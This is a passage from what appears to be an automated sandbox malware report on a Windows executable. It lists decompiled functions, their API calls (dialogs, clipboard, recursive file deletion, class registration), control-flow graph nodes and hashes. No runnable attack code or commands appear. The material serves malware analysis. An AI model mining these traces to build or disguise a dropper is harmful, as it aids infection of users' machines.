                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405703
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405713
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040572C
                                                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405738
                                                                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 00405611
                                                                                                                                                                                  • Part of subcall function 00404379: SendMessageW.USER32(00000028,?,00000001,004041A4), ref: 00404387
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405755
                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005529,00000000), ref: 00405763
                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 0040576A
                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 0040578E
                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405793
                                                                                                                                                                                • ShowWindow.USER32(00000008), ref: 004057DD
                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405811
                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00405822
                                                                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405836
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00405856
                                                                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040586F
                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A7
                                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 004058B7
                                                                                                                                                                                • EmptyClipboard.USER32 ref: 004058BD
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C9
                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004058D3
                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E7
                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405907
                                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405912
                                                                                                                                                                                • CloseClipboard.USER32 ref: 00405918
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                • String ID: {
                                                                                                                                                                                • API String ID: 590372296-366298937
                                                                                                                                                                                • Opcode ID: 76257269951a7008dfdc90867c28ba5585546a04cccc1881335d18026b5b47bc
                                                                                                                                                                                • Instruction ID: ce320b3aa05de7a86cd71a66421b7d26801e1fa413e38a053d13c4a4e4f3a794
                                                                                                                                                                                • Opcode Fuzzy Hash: 76257269951a7008dfdc90867c28ba5585546a04cccc1881335d18026b5b47bc
                                                                                                                                                                                • Instruction Fuzzy Hash: 43B15BB1900608FFDB119F64DD89EAE7B79FB44354F00802AFA45B61A0CB794E51DFA8
                                                                                                                                                                                Function 6FDF1B5F Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 6FDF121B: GlobalAlloc.KERNEL32(00000040,?,6FDF123B,?,6FDF12DF,00000019,6FDF11BE,-000000A0), ref: 6FDF1225
                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6FDF1C8D
                                                                                                                                                                                • lstrcpyW.KERNEL32(00000008,?), ref: 6FDF1CD5
                                                                                                                                                                                • lstrcpyW.KERNEL32(00000808,?), ref: 6FDF1CDF
                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6FDF1CF2
                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 6FDF1DD4
                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 6FDF1DD9
                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 6FDF1DDE
                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6FDF1FC8
                                                                                                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 6FDF2182
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000008), ref: 6FDF2201
                                                                                                                                                                                • LoadLibraryW.KERNEL32(00000008), ref: 6FDF2212
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 6FDF226C
                                                                                                                                                                                • lstrlenW.KERNEL32(00000808), ref: 6FDF2286
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28269523122.000000006FDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FDF0000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28269495512.000000006FDF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28269551381.000000006FDF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28269577474.000000006FDF6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6fdf0000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 245916457-0
                                                                                                                                                                                • Opcode ID: e4f092c925697fcf34ff27544432c66dfce45c35ea530508ac76049bcd1ae087
                                                                                                                                                                                • Instruction ID: 70c6531220d60802d2e4942c146eba30376f6cf8754db1f76d7c4c6f3447f643
                                                                                                                                                                                • Opcode Fuzzy Hash: e4f092c925697fcf34ff27544432c66dfce45c35ea530508ac76049bcd1ae087
                                                                                                                                                                                • Instruction Fuzzy Hash: F122ADB6D06745DEDB90CFB8C980AEDB7B4FF0631AF12462AD1A5E7180D77076828B50
                                                                                                                                                                                Function 00405B00 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 656 405b00-405b26 call 405dcb 659 405b28-405b3a DeleteFileW 656->659 660 405b3f-405b46 656->660 661 405cbc-405cc0 659->661 662 405b48-405b4a 660->662 663 405b59-405b69 call 4063ee 660->663 664 405b50-405b53 662->664 665 405c6a-405c6f 662->665 669 405b78-405b79 call 405d0f 663->669 670 405b6b-405b76 lstrcatW 663->670 664->663 664->665 665->661 668 405c71-405c74 665->668 671 405c76-405c7c 668->671 672 405c7e-405c86 call 40674c 668->672 673 405b7e-405b82 669->673 670->673 671->661 672->661 680 405c88-405c9c call 405cc3 call 405ab8 672->680 676 405b84-405b8c 673->676 677 405b8e-405b94 lstrcatW 673->677 676->677 679 405b99-405bb5 lstrlenW FindFirstFileW 676->679 677->679 682 405bbb-405bc3 679->682 683 405c5f-405c63 679->683 696 405cb4-405cb7 call 405456 680->696 697 405c9e-405ca1 680->697 686 405be3-405bf7 call 4063ee 682->686 687 405bc5-405bcd 682->687 683->665 685 405c65 683->685 685->665 698 405bf9-405c01 686->698 699 405c0e-405c19 call 405ab8 686->699 688 405c42-405c52 FindNextFileW 687->688 689 405bcf-405bd7 687->689 688->682 695 405c58-405c59 FindClose 688->695 689->686 692 405bd9-405be1 689->692 692->686 692->688 695->683 696->661 697->671 700 405ca3-405cb2 call 405456 call 4061b4 697->700 698->688 701 405c03-405c0c call 405b00 698->701 709 405c3a-405c3d call 405456 699->709 710 405c1b-405c1e 699->710 700->661 701->688 709->688 713 405c20-405c30 call 405456 call 4061b4 710->713 714 405c32-405c38 710->714 713->688 714->688
                                                                                                                                                                                APIs
                                                                                                                                                                                • DeleteFileW.KERNELBASE(?,?,76F43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B29
                                                                                                                                                                                • lstrcatW.KERNEL32(007A3F50,\*.*,007A3F50,?,?,76F43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B71
                                                                                                                                                                                • lstrcatW.KERNEL32(?,0040A014,?,007A3F50,?,?,76F43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B94
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F50,?,?,76F43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B9A
                                                                                                                                                                                • FindFirstFileW.KERNEL32(007A3F50,?,?,?,0040A014,?,007A3F50,?,?,76F43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BAA
                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C4A
                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00405C59
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\02Eh1ah35H.exe"$C:\Users\user\AppData\Local\Temp\$P?z$\*.*
                                                                                                                                                                                • API String ID: 2035342205-156625688
                                                                                                                                                                                • Opcode ID: 9bcf84aa20197a85572e9300232fccf325a3569ae83ff5500f6c5511c7c60933
                                                                                                                                                                                • Instruction ID: d176cfcb2707c6ba555092c79fa60715814496245c058da0d6595325efdb1864
                                                                                                                                                                                • Opcode Fuzzy Hash: 9bcf84aa20197a85572e9300232fccf325a3569ae83ff5500f6c5511c7c60933
                                                                                                                                                                                • Instruction Fuzzy Hash: BE41D530804A15AAEB216B658D89EBF7678EF42715F14813FF801711D2DB7C5E82CE6E
                                                                                                                                                                                Function 0040674C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindFirstFileW.KERNELBASE(76F43420,007A4F98,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,00405E14,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,76F43420,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76F43420,C:\Users\user\AppData\Local\Temp\), ref: 00406757
                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00406763
                                                                                                                                                                                Strings
                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nsbF672.tmp, xrefs: 0040674C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsbF672.tmp
                                                                                                                                                                                • API String ID: 2295610775-4002028044
                                                                                                                                                                                • Opcode ID: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                                                                                                                                                                • Instruction ID: 5230d556015edc92dacd95909e5542708b333c59f405b635cf09ddc887f28092
                                                                                                                                                                                • Opcode Fuzzy Hash: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                                                                                                                                                                • Instruction Fuzzy Hash: CCD012315192205FC75027386F0C84B7A599F567353264B36F0AAF21E0C6788C3286AC
                                                                                                                                                                                Function 00403E6B Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 190 403e6b-403e7d 191 403e83-403e89 190->191 192 403fbe-403fcd 190->192 191->192 193 403e8f-403e98 191->193 194 40401c-404031 192->194 195 403fcf-404017 GetDlgItem * 2 call 404344 SetClassLongW call 40140b 192->195 196 403e9a-403ea7 SetWindowPos 193->196 197 403ead-403eb0 193->197 199 404071-404076 call 404390 194->199 200 404033-404036 194->200 195->194 196->197 202 403eb2-403ec4 ShowWindow 197->202 203 403eca-403ed0 197->203 209 40407b-404096 199->209 205 404038-404043 call 401389 200->205 206 404069-40406b 200->206 202->203 210 403ed2-403ee7 DestroyWindow 203->210 211 403eec-403eef 203->211 205->206 221 404045-404064 SendMessageW 205->221 206->199 208 404311 206->208 216 404313-40431a 208->216 214 404098-40409a call 40140b 209->214 215 40409f-4040a5 209->215 217 4042ee-4042f4 210->217 219 403ef1-403efd SetWindowLongW 211->219 220 403f02-403f08 211->220 214->215 224 4040ab-4040b6 215->224 225 4042cf-4042e8 DestroyWindow EndDialog 215->225 217->208 223 4042f6-4042fc 217->223 219->216 226 403fab-403fb9 call 4043ab 220->226 227 403f0e-403f1f GetDlgItem 220->227 221->216 223->208 231 4042fe-404307 ShowWindow 223->231 224->225 232 4040bc-404109 call 40642b call 404344 * 3 GetDlgItem 224->232 225->217 226->216 228 403f21-403f38 SendMessageW IsWindowEnabled 227->228 229 403f3e-403f41 227->229 228->208 228->229 233 403f43-403f44 229->233 234 403f46-403f49 229->234 231->208 260 404113-40414f ShowWindow KiUserCallbackDispatcher call 404366 EnableWindow 232->260 261 40410b-404110 232->261 237 403f74-403f79 call 40431d 233->237 238 403f57-403f5c 234->238 239 403f4b-403f51 234->239 237->226 241 403f92-403fa5 SendMessageW 238->241 243 403f5e-403f64 238->243 239->241 242 403f53-403f55 239->242 241->226 242->237 246 403f66-403f6c call 40140b 243->246 247 403f7b-403f84 call 40140b 243->247 258 403f72 246->258 247->226 256 403f86-403f90 247->256 256->258 258->237 264 404151-404152 260->264 265 404154 260->265 261->260 266 404156-404184 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404186-404197 SendMessageW 266->267 268 404199 266->268 269 40419f-4041de call 404379 call 403e4c call 4063ee lstrlenW call 40642b SetWindowTextW call 401389 267->269 268->269 269->209 280 4041e4-4041e6 269->280 280->209 281 4041ec-4041f0 280->281 282 4041f2-4041f8 281->282 283 40420f-404223 DestroyWindow 281->283 282->208 284 4041fe-404204 282->284 283->217 285 404229-404256 CreateDialogParamW 283->285 284->209 286 40420a 284->286 285->217 287 40425c-4042b3 call 404344 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->208 287->208 292 4042b5-4042c8 ShowWindow call 404390 287->292 294 4042cd 292->294 294->217
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EA7
                                                                                                                                                                                • ShowWindow.USER32(?), ref: 00403EC4
                                                                                                                                                                                • DestroyWindow.USER32 ref: 00403ED8
                                                                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF4
                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403F15
                                                                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F29
                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403F30
                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403FDE
                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403FE8
                                                                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00404002
                                                                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404053
                                                                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 004040F9
                                                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 0040411A
                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040412C
                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 00404147
                                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040415D
                                                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 00404164
                                                                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040417C
                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040418F
                                                                                                                                                                                • lstrlenW.KERNEL32(007A1F48,?,007A1F48,00000000), ref: 004041B9
                                                                                                                                                                                • SetWindowTextW.USER32(?,007A1F48), ref: 004041CD
                                                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 00404301
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3282139019-0
                                                                                                                                                                                • Opcode ID: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
                                                                                                                                                                                • Instruction ID: fd8a01c06953bfbcdc6c7a7ca4fde1a241a6ed83f8ebcdeac2000881ab9a06ac
                                                                                                                                                                                • Opcode Fuzzy Hash: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
                                                                                                                                                                                • Instruction Fuzzy Hash: 67C1BFB1604604AFDB206F61ED85D2A3B78EBCA705B10853EF651B11F0CB3D9941DB6E
                                                                                                                                                                                Function 00403ABD Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 295 403abd-403ad5 call 4067e3 298 403ad7-403ae2 GetUserDefaultUILanguage call 406335 295->298 299 403ae9-403b20 call 4062bc 295->299 303 403ae7 298->303 304 403b22-403b33 call 4062bc 299->304 305 403b38-403b3e lstrcatW 299->305 306 403b43-403b6c call 403d93 call 405dcb 303->306 304->305 305->306 312 403b72-403b77 306->312 313 403bfe-403c06 call 405dcb 306->313 312->313 314 403b7d-403ba5 call 4062bc 312->314 319 403c14-403c39 LoadImageW 313->319 320 403c08-403c0f call 40642b 313->320 314->313 324 403ba7-403bab 314->324 322 403cba-403cc2 call 40140b 319->322 323 403c3b-403c6b RegisterClassW 319->323 320->319 337 403cc4-403cc7 322->337 338 403ccc-403cd7 call 403d93 322->338 325 403c71-403cb5 SystemParametersInfoW CreateWindowExW 323->325 326 403d89 323->326 328 403bbd-403bc9 lstrlenW 324->328 329 403bad-403bba call 405cf0 324->329 325->322 331 403d8b-403d92 326->331 332 403bf1-403bf9 call 405cc3 call 4063ee 328->332 333 403bcb-403bd9 lstrcmpiW 328->333 329->328 332->313 333->332 336 403bdb-403be5 GetFileAttributesW 333->336 340 403be7-403be9 336->340 341 403beb-403bec call 405d0f 336->341 337->331 347 403d60-403d61 call 405529 338->347 348 403cdd-403cf7 ShowWindow call 406773 338->348 340->332 340->341 341->332 351 403d66-403d68 347->351 355 403d03-403d15 GetClassInfoW 348->355 356 403cf9-403cfe call 406773 348->356 353 403d82-403d84 call 40140b 351->353 354 403d6a-403d70 351->354 353->326 354->337 359 403d76-403d7d call 40140b 354->359 357 403d17-403d27 GetClassInfoW RegisterClassW 355->357 358 403d2d-403d50 DialogBoxParamW call 40140b 355->358 356->355 357->358 364 403d55-403d5e call 403a0d 358->364 359->337 364->331
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                                                                                                                                                                  • Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                                                                                                                                                                • GetUserDefaultUILanguage.KERNELBASE(00000002,76F43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\02Eh1ah35H.exe",00000000), ref: 00403AD7
                                                                                                                                                                                  • Part of subcall function 00406335: wsprintfW.USER32 ref: 00406342
                                                                                                                                                                                • lstrcatW.KERNEL32(1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,76F43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\02Eh1ah35H.exe",00000000), ref: 00403B3E
                                                                                                                                                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,76F43420), ref: 00403BBE
